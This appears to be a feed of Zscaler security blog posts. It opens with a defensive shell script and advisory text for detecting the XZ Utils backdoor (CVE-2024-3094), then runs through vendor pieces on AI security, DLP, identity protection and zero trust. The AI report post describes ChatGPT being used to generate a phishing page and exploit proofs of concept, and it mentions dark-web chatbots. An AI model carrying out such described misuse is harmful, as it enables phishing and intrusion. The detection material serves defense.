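A practical host check, written here as an added example rather than taken from the advisory or from XZ Utils itself, that complements the one-line grep given in the detection section further down: it compares the parsed xz version exactly, so a release such as a hypothetical 5.6.10 is not misreported, and it also looks at which liblzma the installed sshd actually links, since that library, not the xz command-line tool, is where the backdoor lives. It assumes sshd is at the path reported by command -v or at /usr/sbin/sshd, and it reads the version that liblzma embeds for lzma_version_string() via strings, which is a heuristic rather than a guarantee:

```shell
#!/bin/sh
# Added example, not part of the Zscaler advisory or of XZ Utils.
# Stricter than `xz --version | grep '5\.6\.[01]'`: exact version match,
# plus a look at the liblzma that the installed sshd is linked against.

# Backdoored upstream releases named in the advisory.
AFFECTED_VERSIONS="5.6.0 5.6.1"

# Return 0 if $1 is exactly one of the affected versions, 1 otherwise.
xz_version_affected() {
    for v in $AFFECTED_VERSIONS; do
        [ "$1" = "$v" ] && return 0
    done
    return 1
}

# Reduce `xz --version` output (first line: "xz (XZ Utils) 5.6.1") to the
# bare version number, i.e. the last field of the first line.
parse_xz_version() {
    printf '%s\n' "$1" | awk 'NR == 1 { print $NF }'
}

# Path of the liblzma shared object a binary resolves at load time (ldd
# lists transitive dependencies too, so liblzma pulled in via libsystemd
# shows up). Prints nothing if the binary does not load liblzma.
linked_liblzma() {
    ldd "$1" 2>/dev/null | awk '/liblzma/ { print $3; exit }'
}

# Version string embedded in a liblzma .so (assumed to be the string that
# lzma_version_string() returns); a heuristic based on `strings`.
liblzma_version() {
    command -v strings >/dev/null 2>&1 || return 0
    strings "$1" 2>/dev/null | grep -E '^5\.[0-9]+\.[0-9]+$' | head -n 1
}

main() {
    rc=0
    if command -v xz >/dev/null 2>&1; then
        ver=$(parse_xz_version "$(xz --version 2>/dev/null)")
        if xz_version_affected "$ver"; then
            echo "xz $ver: AFFECTED (CVE-2024-3094)"
            rc=1
        else
            echo "xz ${ver:-unknown}: not an affected release"
        fi
    else
        echo "xz: not installed"
    fi

    sshd=$(command -v sshd 2>/dev/null || echo /usr/sbin/sshd)
    if [ ! -x "$sshd" ]; then
        echo "sshd: not installed"
    elif ! command -v ldd >/dev/null 2>&1; then
        echo "$sshd: ldd not available, cannot inspect linked libraries"
    else
        lib=$(linked_liblzma "$sshd")
        if [ -z "$lib" ]; then
            echo "$sshd: does not load liblzma (backdoor has no path into it)"
        else
            libver=$(liblzma_version "$lib")
            if xz_version_affected "$libver"; then
                echo "$sshd loads $lib ($libver): AFFECTED (CVE-2024-3094)"
                rc=1
            else
                echo "$sshd loads $lib (${libver:-version unknown}): not an affected release"
            fi
        fi
    fi
    return "$rc"
}

if main; then
    echo "RESULT: no affected XZ Utils release found"
else
    echo "RESULT: affected release present; downgrade to 5.4.x as recommended above"
fi
```

Run it as root or as any user that can read the sshd binary; a non-zero result from main is the signal to act on. A distribution package may carry a patched build whose version string still reads 5.6.x, so treat the package manager's view of xz-libs / liblzma5 as authoritative where the two disagree.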
The decrypted data carries an Ed448 signature, which the backdoor verifies before executing the payload on the victim's SSH server. The backdoor contains only the public key, which ensures that only the holders of the corresponding private key can generate valid payloads. The signature also covers the host's SSH public key, so a valid payload for one host cannot be replayed against a different host.
Recommendations
In response to this threat, the Cybersecurity and Infrastructure Security Agency (CISA) has issued guidance for affected individuals and organizations. XZ Utils developers and users are strongly advised to downgrade to a trusted, unaffected version predating 5.6.0, such as the 5.4.6 stable release, or to upgrade to a fixed version once one is available. Thorough audits of system logs and network traffic are encouraged to identify any signs of suspicious activity, and any findings should be reported to CISA for further investigation.
How To Detect CVE-2024-3094
To check whether your installed version of XZ Utils is impacted (5.6.0 or 5.6.1), run the following command; any output means an affected version is present:
  $(which xz) --version | grep '5\.6\.[01]'
Note that this inspects the xz command-line tool; the backdoor itself lives in liblzma, so also confirm the library version your distribution's package manager reports.
Zscaler Coverage
The Zscaler ThreatLabz team has deployed protection:
  Zscaler Advanced Threat Protection: Linux.Exploit.CVE-2024-3094
Zscaler continues to monitor activity that may be exploiting this vulnerability through our telemetry data.
Mon, 01 Apr 2024 17:23:11 -0700 Varun Sandila
New AI Insights: Explore Key AI Trends and Risks in the ThreatLabz 2024 AI Security Report
Today, Zscaler ThreatLabz released its inaugural ThreatLabz 2024 AI Security Report. The report comes at a key inflection point: as AI tools and large language models (LLMs) like ChatGPT weave their way into the fabric of enterprise life, questions about how to securely enable these tools and protect enterprise data remain unanswered.
Complicating matters, AI is also driving a new generation of cyber threats, enabling adversaries to launch attacks with greater speed, sophistication and scale. Enterprises must therefore both securely enable AI productivity tools within the business and leverage AI to defend against AI-driven threats.
The Zscaler ThreatLabz 2024 AI Security Report draws on more than 18 billion transactions in the Zscaler Zero Trust Exchange™ from April 2023 to January 2024. It uncovers key trends, risks and best practices in the ways that enterprises are adopting, and blocking, AI applications across industry verticals and around the world. ThreatLabz also offers insight into the evolving AI threat landscape and real-world AI threat scenarios, before providing security best practices for defending against them (including with AI). Download the Zscaler ThreatLabz 2024 AI Security Report to uncover data-driven AI insights and enterprise best practices for securing AI.
Key ThreatLabz AI Findings
- Explosive AI growth: Enterprise AI/ML transactions surged by 595% between April 2023 and January 2024.
- Concurrent rise in blocked AI traffic: Even as enterprise AI usage accelerates, enterprises block 18.5% of all AI transactions, a 577% increase that signals rising security concerns.
- Primary industries driving AI traffic: Manufacturing accounts for 21% of all AI transactions in the Zscaler security cloud, followed by finance and insurance (20%) and services (17%).
- Clear AI leaders: The most popular AI/ML applications for enterprises by transaction volume are ChatGPT, Drift, OpenAI, Writer and LivePerson.
- Global AI adoption: The top five countries generating the most enterprise AI transactions are the US, India, the UK, Australia and Japan.
- A new AI threat landscape: AI is empowering threat actors in unprecedented ways, including AI-driven phishing campaigns, deepfakes and social engineering attacks, polymorphic ransomware, enterprise attack surface discovery, exploit generation, and more.
Enterprise decision point: when to allow AI apps, when to block them, and how to mitigate 'shadow AI' risk
One key theme of the report is that, to reap the full transformative potential of AI, enterprises must securely enable it: minimize the risks of integrating and developing AI tools, while devising strategies to prevent or curtail the spread of unapproved AI tools in the enterprise, a trend dubbed 'shadow AI'. In general, these risks fall into three broad categories:
Protecting sensitive data: Generative AI tools can inadvertently leak sensitive and confidential information, making data protection measures crucial. Sensitive information disclosure is number six on the OWASP (Open Worldwide Application Security Project) Top 10 for Large Language Model Applications. Apart from adversarial threats like prompt injection or malware, the biggest risks can stem from well-meaning users who inadvertently expose sensitive or proprietary data to LLMs. Enterprise users may do this in numerous ways without realizing it, for example an engineer asking a generative AI tool to optimize or refactor proprietary code, or a sales team member asking an AI to forecast pipeline from historical sales figures. Enterprises should implement robust AI policy guidelines and technology-based data loss prevention (DLP) measures to prevent accidental leaks and breaches. They should also gain deep visibility into AI app usage to prevent or mitigate shadow AI, with granular access controls that ensure users only use approved AI applications.
Data privacy and security risks of AI apps: Not all AI applications offer the same level of data privacy and security. Terms, conditions and policies vary greatly, and enterprises should consider whether their data will, for example, be used to train language models, mined for advertising, or sold to third parties. Enterprises must assess and assign security risk scores to the AI applications they use, considering factors like data protection and the security practices of the companies behind them.
Data quality and poisoning concerns: The quality and scale of the data used to train AI applications directly affect the reliability of AI outputs. Enterprises should carefully evaluate data quality when selecting an AI solution and establish a strong security foundation to mitigate risks like data poisoning.
The new era of AI-driven threats
The risks of AI are bi-directional: from outside the enterprise, businesses face a continuous wave of threats that now includes AI-driven attacks. Virtually every existing type of threat can be aided by AI, which means attacks launched at unprecedented speed, sophistication and scale. The future possibilities are open-ended, so enterprises face unknown unknowns when it comes to AI-driven cyber attacks. Still, clear attack patterns are emerging. In the 2024 AI Security Report, ThreatLabz provides insight into numerous evolving threat types, including:
- AI impersonation: AI deepfakes, sophisticated social engineering attacks, misinformation, and more.
- AI-generated phishing campaigns: end-to-end campaign generation, along with a ThreatLabz case study in creating a phishing login page using ChatGPT in seven simple prompts.
- AI-driven malware and ransomware: how threat actors are leveraging AI automation across numerous stages of the attack chain.
- Using ChatGPT to generate vulnerability exploits: ThreatLabz shows how easy it is to create exploit PoCs, in this case for Log4j (CVE-2021-44228) and the Apache HTTP Server path traversal (CVE-2021-41773).
- Dark chatbots: the proliferation of dark web GPT models like FraudGPT and WormGPT that lack security guardrails.
- And much more.
Best practices for secure AI transformation and layered AI + zero trust cyber defense
The transformative power of AI is undeniable. To reap its enormous potential, enterprises must overcome the bi-directional set of risks that AI creates, namely:
- Securely enabling AI: protecting enterprise data while ushering in transformative productivity changes.
- Using AI to fight AI: using enterprise security data to drive AI threat prevention across the attack chain, deliver real-time security insights, and fast-track zero trust.
To that end, the Zscaler ThreatLabz 2024 AI Security Report offers guidance including:
- How to securely enable ChatGPT: a best-practice case study for securing generative AI tools, in five steps.
- AI best practices and AI policy guidelines: AI frameworks and best practices that any enterprise can adopt.
- How Zscaler uses AI to stop cyber threats: leveraging AI detections across each stage of the attack chain, with holistic visibility into enterprise cyber risk.
- How Zscaler enables secure AI transformation: the key capabilities enterprises require to securely embrace generative AI and ML tools, including full visibility into AI tool usage, granular access policy creation for AI, granular data security for AI applications, and powerful controls with browser isolation.
Of course, AI begins and ends with the power of data. To dive deeper, download your copy of the Zscaler ThreatLabz 2024 AI Security Report or register for our live session with Zscaler CSO Deepen Desai, Navigating the AI Security Horizon: Insights from the Zscaler ThreatLabz 2024 AI Security Report.
Meanwhile, if you want more information on how Zscaler is harnessing the power of AI, register for our innovation launch, The First AI Data Security Platform.
Wed, 27 Mar 2024 11:54:38 -0700 Will Seaton
The Best Medicine for Healthcare Data Is Integrated DLP
You could argue that the challenges of securing medical data are more imposing than those of securing any other form of data. Electronic health records (EHR) are regularly transferred and shared between providers, and these records contain personal, in-depth patient data. These transfers put protected health information (PHI) at high risk as it moves from location to location. Additionally, the stringent regulations and compliance requirements for PHI force providers to work out the data protection strategy that best fits their needs, a necessary evil for some time now. To this end, our friends in the Health Information Management Working Group at the Cloud Security Alliance (CSA) have put together a great discussion of the task of securing patient data and the development of best practices. For providers looking for guidance from experts who have made the data protection journey, this content can be extremely valuable:
  Cloud Security Alliance Working Group: Health Information Management
  Research Publication: Data Loss Prevention in Healthcare
One of the main topics of this publication is the architecture from which you should deliver data loss prevention (DLP) and data protection. While it is important to understand best practices for implementing data protection in healthcare, it is also valuable to know what the right architecture for a unified data protection platform looks like. With that, let's look at how Gartner defines Security Service Edge (SSE) and how it can help providers deliver better protection for data in motion and at rest.
Securing Data in Motion
In the medical and health industries, protecting sensitive data in transit is crucial.
With the increasing reliance on digital platforms and the internet, organizations face the challenge of safeguarding data over untrusted networks. The core building block for securing this sensitive data is DLP. Inline DLP combined with SSL inspection enables sensitive data in transit to be identified and classified, so that leaks to the internet or via email are prevented and the confidentiality of patient information is maintained. To this end, inline visibility into cloud apps such as electronic health record systems is also essential. By leveraging inline CASB technology, organizations can detect shadow IT and block risky apps, ensuring data security without hindering the use of critical cloud applications.
In healthcare, the use of personal devices by medical professionals and contractors poses a unique challenge. Browser isolation allows seamless data access from personal devices without compromising security: by hosting the browser session in a secure cloud environment, sensitive data remains protected even on unmanaged devices. Better yet, users get the specialized power of a purpose-built enterprise browser only when needed, without having to change which browser they use.
Perhaps the biggest benefit of SSE is that all of these features are integrated into a centralized, cloud-delivered platform. When hosted in the cloud, DLP is not only easier to deploy but also more accurate in detection. Rather than dealing with multiple policies that could trigger differently and at different times, SSE gives you a single view across your landscape, so decisions can be made on a holistic basis.
Securing Data at Rest in the Medical Industry
When it comes to securing medical data at rest, a few key capabilities have helped healthcare organizations do so with greater ease:
SaaS Data Security lets you prioritize securing sensitive data in SaaS platforms, where it can easily be shared in risky ways. To prevent this, providers often add CASB to their data protection strategy. By using a CASB that applies the same DLP policy to data at rest as to data in motion, you can reduce alert fatigue and streamline response times. Because the same DLP engine evaluates data inline and at rest in SaaS, visibility is consistent across channels. This is one of the main advantages of standardizing on a Security Service Edge architecture.
SaaS Security Posture Management (SSPM) helps to identify and fix misconfigurations in SaaS platforms, such as multifactor authentication left disabled or risky open shares. Look for SSPM platforms that map to compliance frameworks like NIST or HIPAA to establish and maintain the required security posture.
SaaS Supply Chain Security addresses the risks of third-party applications that connect into your SaaS platforms. You can scan SaaS platforms for risky connections from third-party applications that have known vulnerabilities or allow unauthorized access to sensitive medical data, and get guidance on revoking those connections to maintain data hygiene and a strong overall posture.
Endpoint DLP protects sensitive data stored on endpoints and removable media. Implement endpoint DLP with a unified agent that works alongside an SSE platform and enforces the same DLP policy as inline inspection. This helps prevent data leaks from employee devices and protects patient information.
A word on Zscaler and shared workstation security: Securing data on shared workstations can be a challenge, as implementing and managing user-level policy controls across multiple logins on a single device is often difficult. Zscaler integrates with the Imprivata Digital Identity platform, allowing providers to support these multi-user workstation environments. Clinicians can securely authenticate in and out of devices and access only the applications for which they have been authorized.
Bringing It All Together
Unifying data protection into one platform is extremely powerful and can drastically simplify how you secure data. When delivered from an always-on cloud, you get a single DLP policy that follows users everywhere, and consistent alerting no matter where the data is located. It is helpful to gain a variety of perspectives on how to secure data, especially for a task as tricky as protecting medical data. While there are many approaches, understanding best practices can make all the difference for providers beginning their journey. Building the right architecture is equally important. If you are interested in learning more about Security Service Edge and how Zscaler can help you secure your patient data, we are here to chat or show you a demo.
Tue, 26 Mar 2024 05:33:13 -0700 Tamer Baker
Protecting Identity Becomes Pivotal in Stopping Cyberattacks
As today's workplace transforms, data is no longer centralized; it is spread across clouds, which increases the attack surface. Attackers are constantly looking for vulnerabilities to exploit and searching for the Achilles heel in identity systems that could give them entry into your IT environment. Threat actors now use sophisticated methods to target identity and access management infrastructure, and credential misuse is the most common attack method.
According to Gartner, “Modern attacks have shown that identity hygiene is not enough to prevent breaches. Multifactor authentication and entitlement management can be circumvented, and they lack mechanisms for detection and response if something goes wrong.” Prioritize securing identity infrastructure with tools that monitor identity attack techniques, protect identity and access controls, detect attacks as they occur, and enable fast remediation.
Zscaler ITDR detects credential theft and privilege misuse, attacks on Active Directory, and risky entitlements that create attack paths
With identity-based attacks on the rise, businesses need the ability to detect when attackers exploit, misuse or steal enterprise identities. Identifying identity-based threats is crucial because attackers rely on stolen credentials and Active Directory (AD) exploitation techniques for privilege escalation and lateral movement across your environment. Zscaler ITDR helps you thwart identity-based AD attacks in real time and gives you actionable insight into gaps in your identity attack surface. The solution continuously monitors identities, provides visibility into misconfigurations and risky permissions, and detects identity-based attacks such as credential theft, multifactor authentication bypass and privilege escalation.
Gain Full Visibility
Uncover blind spots and hidden weaknesses that leave your environment susceptible to identity-based attacks, such as exposed surfaces, dormant credentials and policy violations.
Real-Time Identity Threat Detection and Response
Zscaler Identity Protection uses identity threat detections and decoys that raise high-fidelity alerts, helping your security teams remediate swiftly with targeted responses. The same endpoint agent that runs deception also detects identity attacks on the endpoint.
These include advanced attacks like DCSync, DCShadow, LDAP enumeration, session enumeration, Kerberoasting, and more.
Reduce Identity Risk
With deep visibility into identity context, Zscaler Identity Protection helps your security teams identify, address and purge compromised systems and exposed credentials quickly. Security teams often struggle to collect the context and correlations needed to investigate threats. Zscaler ITDR addresses this by consolidating all risk signals, detected threats, failed posture checks, Okta metadata and policy blocks (ZIA/ZPA) into a single view for each identity, so you can quickly investigate risky identities for indicators of compromise and potential exploitation.
Prevent Credential Misuse/Theft
Attackers use stolen credentials and attack Active Directory to escalate privileges and move laterally. Zscaler Identity Protection helps detect credential exploits and prevent credential theft or misuse.
Spot Lateral Movement
Stop attackers who have gotten past perimeter-based defenses and are attempting to move laterally through your environment. Zscaler ITDR identifies the misconfigurations and credential exposures that create the attack paths attackers use for lateral movement.
Zscaler ITDR: Beyond just prevention – Monitor, detect, & respond to identity threats
Monitor: Identity systems are in constant flux as configurations and permissions change. Get alerts when a configuration change introduces new risk. Organizations also lack visibility into credential sprawl across their endpoint footprint, leaving them vulnerable to attackers who exploit those credentials to access sensitive data and apps.
Zscaler ITDR audits all endpoints to identify credentials and other sensitive material in sources such as files, the registry, memory, caches, configuration files, credential managers and browsers. This visibility into endpoint credential exposure lets you identify lateral movement paths, enforce policies and clean up credentials to reduce the internal attack surface.
Detect: ITDR automatically surfaces hidden risks that might otherwise slip through the cracks. Zscaler ITDR pulls together all risk signals, detected threats, failed posture checks, Okta metadata and ZIA/ZPA policy blocks into a single unified view that provides a complete picture of risk for an identity. This helps identify unmanaged identities, misconfigured settings and credential misuse.
Respond: When ITDR spots an attack targeting your identity store, you can take immediate action: restrict or terminate the offending identities and shut down the threat before it has a chance to wreak havoc.
Zscaler ITDR Benefits
Minimize the Attack Surface: Reduce the attack surface through continuous visibility into attack vectors and identity misconfigurations, and stop adversarial advances, including ransomware attacks, in their tracks with decoys.
Real-Time Identity Threat Detection: Thwart sophisticated attacks on Active Directory using identity threat detections on endpoints.
Accelerate Incident Response: Built-in threat detection and response speeds up detection and expands coverage to significantly reduce mean time to respond (MTTR). Risk scoring helps security teams prioritize what matters most.
Conclusion
Breaches are inevitable, and preventative security measures alone are not sufficient to thwart them. Staying upbeat while fighting cyberthreats, shrinking budgets and staff turnover is a tall task, but how we respond today dictates how we perform tomorrow.
Choosing and adopting identity protection solutions like ITDR helps your company evolve its zero trust security and compliance posture in response to the changing threat landscape. Zscaler ITDR strengthens your zero trust posture by mitigating the risks of user compromise and privilege exploitation.
Fri, 22 Mar 2024 02:39:16 -0700 Nagesh Swamy
Eliminate Risky Attack Surfaces
Many moons ago, when the world wide web was young and the nerd in me was strong, I remember building a PC and setting it up as a web server. In those exciting, pioneering days, it was quite something to have my very own IP address on the internet and serve my own web pages directly from my Apache server to the world. Great fun. I also remember looking at the server logs in horror as I scrolled through page upon page of failed login, and presumably hacking, attempts. I had buttoned things up pretty well from a security standpoint, but even so, it would only have taken a vulnerability in an unpatched piece of software for a breach to occur, and from there all bets would have been off. Even today, many internet service providers will let you provision your own server, should you feel brave enough. Of course, the stakes were not high for me at home, but knowing what we know now about the growth of ransomware attacks and how AI is facilitating them, no organization would dare do such a thing in 2024.
Back then, I had created an obvious and open attack surface. Tools were (and still are) readily available to scan IP address ranges on any network and identify open ports. In my case, ports 22, 80 and 443 were open to serve web pages and let me administer the server remotely. Every open port is a potential conduit into the heart of the hosting device, so open ports should be eliminated wherever possible.
Open ports, VPNs, and business

Since online remote working became a real possibility in the early 2000s, organizations have tried to protect themselves and their employees by adopting VPN technology to encrypt traffic between a remote device and a VPN concentrator at the head office, allowing employees to access services like email, file and print servers. Even when these services became cloud-based solutions like Gmail and Dropbox, many organizations pulled that traffic across a VPN to apply IT access policies. Not only did this often lead to an inefficient path from a remote worker to their applications, it also presented a serious security risk. As the performance and dependability of the internet grew, we also saw the advent of site-to-site VPNs, which made for an attractive alternative to the far more expensive carrier circuits, such as MPLS, that had been so prevalent. A vast number of organizations continue to rely on a virtual wide area network (WAN) built on top of VPNs. Unfortunately, as the old saying goes, there's no such thing as a free lunch. Every VPN client or site using the internet as its backbone needs an IP address to connect to and an open port to connect through, and, well, you can see where this is going. Not every VPN solution has an active flaw, just as, luckily, my Apache server didn't at the time I was running it. That said, software is fallible, and history has demonstrated this in numerous instances in which vulnerabilities were discovered and exploited in VPN products. Just last month, a critical flaw was discovered in Ivanti's VPN products, leaving thousands of users and organizations open to attack. Attackers are scanning day and night for vulnerabilities like these to exploit, and AI is only making their lives easier.
“without proper configuration, patch management, and hardening, VPNs are vulnerable to attack” (from Securing IPsec Virtual Private Networks, National Security Agency)

Zscaler is different

The Zscaler Zero Trust Exchange™ works in a fundamentally different way: no VPN is required to connect securely. Instead, connections over the internet (or even from within a managed network) are policed on multiple levels. An agent on your device creates a TLS tunnel to the Zscaler cloud, which accepts connections only from known tenants (Zscaler customers). This tunnel is mutually authenticated and encrypted between the agent and the Zscaler cloud, and the individual and their device(s) must additionally be identified as part of the process. In short, it's not possible to simply open a TLS connection to Zscaler and reach anything. Once an approved user from a known customer with a recognized device connects, they are still prevented from moving laterally, unlike with a VPN, where a connected client is typically placed on a routable network segment. With Zscaler, there is no IP range to which the user has access. Instead, every connection attempt has to be authorized, following the principles of zero trust: a user has access only to the applications for which they've been authorized. With this framework, even if an organization were successfully attacked, the blast radius would be limited. The same cannot be said for network-based security.

Here's the bottom line: VPNs and the firewalls behind them served us well for a long time, but the challenges of maintaining a security posture built on these legacy technologies are so great that it's now a material business risk to use them. You need only turn on the news for a few minutes to be reminded of this. Networks were built fundamentally to enable connectivity, and adding security to them is an uphill battle of putting the right obstacles in the way of that connectivity.
This is why more and more public bodies and private organizations are turning this idea on its head and embracing a zero trust architecture that provides access only for an approved entity, on an approved device, to the applications to which they are entitled. At Zscaler we have built tools to help you assess the potential risk your own organization faces, some of which are free to access. Test your own defenses by visiting and when you're ready to learn more, get in touch!

Tue, 02 Apr 2024 01:00:01 -0700 Simon Tompson

Break Free from Appliance-Based Secure Web Gateway (SWG)

The way we work today is vastly different from a few years ago. McKinsey & Company's State of Organization 2023 report identified that before the COVID-19 pandemic, most organizations expected employees to spend more than 80% of their time in-office. But as of 2023, says the report, 90% of employees have embraced hybrid models, allowing them to work from home or other locations some (if not most) of the time. On a similar note, applications previously hosted in on-premises data centers are increasingly moving to the cloud. Gartner predicted that SaaS application spending would grow 17.9% to total $197 billion in 2023. With employees and apps both migrating off-premises, security controls logically must do the same. It's no exaggeration to state that cloud and mobility have broken the legacy way of approaching security, so why should the castle-and-moat security approach, heavily reliant on hardware such as appliance-based proxies/SWGs, still exist? Users need fast, reliable, secure connectivity to the internet and cloud apps, with the flexibility to connect and work from anywhere. However, traditional SWGs have certain limitations, leading to security challenges, poor user experience, constant maintenance, and scalability issues. Let's take a look at why it's time to break free from appliance-based SWG.
Security challenges

In December 2013, the Google Transparency Report showed just 48% of web traffic was encrypted. Today, the same report shows at least 95% of traffic is encrypted. So it's no surprise that the Zscaler ThreatLabz 2023 State of Encrypted Attacks report found that 85.9% of threats (malware payloads, phishing scams, ad spyware sites, sensitive data leaks, and more) are now delivered over encrypted channels. While most organizations have some form of protection against malware, attackers are evolving their techniques, creating new variants able to bypass reputation-based detection. As threat actors increasingly rely on encrypted channels, it's more crucial than ever to inspect 100% of TLS/SSL traffic. This is the biggest way appliance-based proxies weigh down organizations: most SWG appliances lack the capacity to perform 100% inspection. Our 2023 State of Encrypted Attacks report surveyed 284 IT, security, and networking professionals and found that they mainly use legacy tools like web application firewalls and network-layer firewalls to scan traffic. Respondents agreed that complexity, cost, and performance degradation are the biggest barriers to inspecting all TLS/SSL traffic. Furthermore, certain regulations require different policies for distinct data types, making inspection an arduous task.

Poor user experience

Compared to only a few years ago, the meaning of "fast" is very different for today's internet users. Instant access and connectivity have become the norm at home. Employees contrast the great digital experience in their personal lives with the poor connectivity and performance issues that plague their digital work lives.
Appliance-based SWGs are among the main culprits of poor user experience: they can't scale quickly to handle traffic surges, and they require traffic to be backhauled to a central data center, leading to high latency and lost productivity for users trying to access the internet or SaaS applications. All of this inevitably affects revenue.

Maintenance and scalability issues

Apart from complexity and tedious management, other challenges of appliance-based SWGs are maintenance and scalability. To account for traffic surges and future growth, security teams are forced to overprovision, leaving expensive appliances sitting unused. At other times, they may need to wait months for appliances or upgrades to arrive. With appliance-based SWG, security teams are always spread too thin, having to constantly update SWGs to account for changes to the organization and the threat landscape.

The Zscaler difference

Overcome the limitations of appliance-based SWG with Zscaler.
- Better security: Inspect 100% of TLS/SSL traffic to find and stop threats, 86% of which are delivered over encrypted channels.
- Better user experience: Stop backhauling internet/SaaS traffic with AI-powered Zscaler SWG, delivered from 150+ points of presence worldwide, close to your users and their cloud destinations for lower latency.
- No hardware to maintain: Move to a cloud native proxy architecture and eliminate the hardware headaches of maintenance, updates, patches, and upgrades.
- Platform approach: Extend comprehensive security functions, such as cloud firewall, sandbox, CASB, and data loss prevention, as well as end-to-end experience monitoring, from a single unified platform and agent.
If you'd like to know more about the reasons to break free from appliance-based proxies, check out this on-demand webinar.
Wed, 20 Mar 2024 07:04:23 -0700 Apoorva Ravikrishnan

Mobile World Congress shows a vision of even more connected things

I approached this year's Mobile World Congress as I usually would, with a very open mind. However, this year was different. It was far more fulfilling than previous years and, in some ways, had me feeling overwhelmed. Not so much by the sheer distances walked each day (approximately 20 kilometers) but by the types of discussions about the state of the telco industry and its future directions, which were both enlightening and refreshing. For the first time I had the feeling that 5G will reach new milestones this year, based on the various innovations on show.

Telco networks need to seize opportunities

Network operators globally are shaping their future, with MWC serving as the perfect moment to come together and discuss perspectives and the various opportunities that need to be recognised. Within this, key focus points included what operators can offer in terms of insights into data streams, and the additional overlays or security services they can provide on top to make their services more valuable and sticky for customers. More important, however, is the growing opportunity to be more connected than ever before, offering the maximum potential of interconnectivity. Thanks to this, there is a clear opportunity for collaboration and for the critical next steps that will define the future of telco networks for years to come. For this to happen, however, telcos must start seeing the value of their infrastructure. Similarities can be drawn with parallel industries; take banking, for example. The SWIFT network is critical for international money transfers. While this network is great, there was a demand from consumers for a faster, simpler way to move money. The financial industry responded with more agile alternatives such as Venmo, PayPal, and intra-bank networks to deliver high-speed financial transactions.
These additional services are what drive adoption and add value to financial networks. Telcos, however, risk falling into two traps: becoming a network provider that simply moves data traffic, or expanding their offerings by bundling additional services, such as partnering with Netflix as part of an entertainment package at no extra charge. So far in telco we haven't seen a level of innovation within its services that will lead to additional demand for and consumption of those services. This is where true innovation will happen in the near future. Optimisations are required between every single network and service operator that is delivering and/or creating content. In the age of AI, the level of data and measurement that can be consumed to ensure the best sets of services must be leveraged, from understanding how to best compress a video file through to moving and allowing disparate edge computing usage. All of this is to be delivered through intelligent insights. A few companies have the foresight to realise that they must start looking into the contextual aspects of interconnectivity. It is more important to figure out why a specific device is connected on a specific network, when thousands of devices are making connections every second. Telco providers need to find a way to bucket this information to orchestrate the data streams effectively and deliver on the value of the data that is created.

My key takeaways from the show are:

SIMs are literally everywhere

From facilitating seamless communication between devices to enabling groundbreaking technologies, the versatility and adaptability of SIM cards are redefining the boundaries of connectivity. eSIMs will allow organisations to provide country-specific access to data that travels with the user. The question that pops into my head is how these data streams will be secured in the future.

5G is real

5G is no longer a theory only, even in Europe.
While we still don't have proper standalone 5G in Europe, private 5G has matured to be widely accepted and used. In previous years we were always waiting for the killer app, and speculating about virtual reality goggles occupying this space. This year, more and more applications are demonstrating the potential of virtual worlds, e.g., for training purposes.

Data sovereignty is a driving force

Given our fragile global situation, the topic of data sovereignty has been getting more attention. Organisations and governments alike want to be able to take active control of the locations of their data, and not only of data resilience. The debate steered by NIS2 and new security measures for national critical infrastructure ties into data sovereignty, software, and cloud ecosystems as well.

Moving forward, the focus will be on connectivity being delivered everywhere, now that almost everything is SIM enabled. There will also be questions around how telcos will make use of all the available information and, perhaps more importantly, how they can orchestrate it in one environment and deliver effective controls. The great unifier is security: every user, company, and service demands uniform security on any network. Zscaler, as the world's largest cloud security service, available everywhere, is in a unique position to deliver this glue.

Wed, 20 Mar 2024 04:06:08 -0700 Nathan Howe

2024 Zscaler Public Sector Summit in Washington DC

In March 2023 Zscaler held its inaugural Public Sector Summit, bringing together over 500 government and industry leaders to separate zero trust fact from fiction. The exchange last year was enlightening and energizing! We captured highlights from the event in an eBook, The Power of Zero Trust, including the challenges agencies are facing, some of our best practices for developing a robust zero trust architecture, and a use case demonstrating how zero trust can integrate into every part of your agency's operations.
As we prepare for the 2024 Public Sector Summit on April 4th, I am excited that this year's lineup will be bigger and even more engaging. With more than 22 guest speakers from across government, education and the private sector, the audience will hear top-of-mind topics and discuss current threats and challenges facing agencies and the supporting community, such as AI, funding zero trust initiatives, safeguarding critical infrastructure, SD-WAN and much more.

Distinguished Speakers

The power of the public sector community is in the forward-thinking individuals across agencies who have dedicated their careers to transforming our nation securely. We've built a program for the day with a stellar lineup of speakers including:
- Dr. Kelly Fletcher, CIO, Department of State; Luis Coronado, CIO, State Consular Affairs; and Eric Hysen, CIO/Chief AI Officer, Department of Homeland Security, who will join Zscaler CEO Jay Chaudhry during his keynote.
- Chris DeRusha, Federal CISO and Deputy National Cyber Director, OMB.
- Panel on resources to fuel government modernization with Jessie Posilkin, Technical Lead at the Technology Modernization Fund, Maria Roat of MA Consulting, and Eric Mill of GSA.
- Suneel Cherukuri, CISO, DC Government.
- Zach Benz, Sr. Mgr for Cyber Operations/DCISO with Sandia National Laboratories, to talk about AI/ML.
- Panel discussing zero trust implementations with Gerald Caron, CIO, ITA/Commerce; Dan Han, CISO of VCU; Bob Costello, CISO of CISA; and Dr. Gregory Edwards, CISO of FEMA.
- DoD leaders including Winston Beauchamp, DCISO with the Department of the Air Force, and General Les Call, Director of the Zero Trust Portfolio Management Office.
- Systems Integrator panel with Justin DePalmo, CISO and VP of IT at GDIT, and Bob Ritchie, SVP & CTO at SAIC.
- Nelson Sims, Cyber Architect, DC Water, and Dustin Glover, Chief Cyber Officer, State of Louisiana, to discuss securing critical infrastructure.
From Revolution to Evolution

Our CEO and founder, Jay Chaudhry, will keynote the event, setting the stage with his perspective on the zero trust revolution that began over a decade ago, and how it has now surpassed the tipping point in adoption thanks to the dedication of IT leaders across government. He will be joined on stage by Dr. Fletcher, Luis Coronado and Eric Hysen, and followed by many more innovators within the public sector speaking to a number of current cybersecurity issues, including:
- Using AI to combat AI-based threats
- OMB's perspective on the state of zero trust
- Unlocking resources to continue modernizing
- How agency leaders are taking the next steps in their zero trust implementations
- New innovations in predictive cybersecurity to identify and resolve vulnerabilities
View the full agenda here to see the range of topics to be addressed during this year's summit.

Hands-On Zero Trust

In addition to the informative sessions, we will also have hands-on solution stations this year for attendees to dive deeper into areas including:
- From Zero Access to Zero Trust in 10 Minutes: a joint solution with our integration partners AWS, Okta, and CrowdStrike
- Your Network Transformed: zero trust for cloud and branch
- ThreatLabz: global internet threat insights from Zscaler's research team
- CMMC: empowered by zero trust
- Customer Success Center
- Zscaler Digital Experience
